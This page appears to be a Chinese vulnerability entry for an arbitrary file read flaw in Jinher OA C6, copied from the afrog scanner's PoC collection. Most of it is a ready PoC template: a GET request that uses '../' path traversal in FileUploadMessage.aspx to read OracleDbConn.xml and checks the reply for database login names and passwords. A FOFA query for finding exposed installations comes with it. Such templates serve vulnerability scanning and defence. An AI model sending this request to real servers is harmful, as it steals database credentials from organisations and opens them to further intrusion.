jinher-oa-c6-fileuploadmessage-fileread: 金和OA C6 fileuploadmessage 任意文件读取漏洞

日期: 2025-08-01 | 影响软件: jinher-oa-c6-fileuploadmessage | POC: 已公开

漏洞描述

fofa: app="金和网络-金和OA"

PoC代码[已公开]

id: jinher-oa-c6-fileuploadmessage-fileread

info:
  name: 金和OA C6 fileuploadmessage 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |-
    fofa: app="金和网络-金和OA"
  tags: jinher,oa,fileread
  created: 2024/02/29

rules:
  r0:
    request:
      method: GET
      path: /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml
    expression: response.status == 200 && response.body.bcontains(b'<DbLoginName>') && response.body.bcontains(b'<DbLoginPass>')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jinher-oa-c6-fileuploadmessage-fileread.yaml